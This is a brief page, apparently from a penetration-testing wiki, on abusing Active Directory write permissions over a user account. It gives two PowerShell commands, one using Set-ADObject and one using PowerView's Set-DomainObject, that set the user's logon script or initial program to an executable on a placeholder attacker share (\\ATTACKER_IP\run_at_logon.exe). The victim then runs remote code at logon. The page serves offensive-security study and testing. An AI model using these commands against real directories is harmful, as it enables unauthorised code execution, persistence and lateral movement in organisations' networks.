Logon script
This abuse can be carried out when controlling an object that has WriteProperty, GenericWrite or GenericAll over a target user.
The attacker can make the user execute a custom script at logon. This can be achieved with the Active Directory PowerShell module or with Set-DomainObject (PowerView module).
1
# With Set-ADObject (Active Directory module)
2
Set-ADObject -SamAccountName 'user' -PropertyName scriptpath -PropertyValue "\\ATTACKER_IP\run_at_logon.exe"
3
โ€‹
4
# With Set-DomainObject (PowerView module)
5
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\ATTACKER_IP\run_at_logon.exe'} -Verbose
Copied!
Last modified 1yr ago
Copy link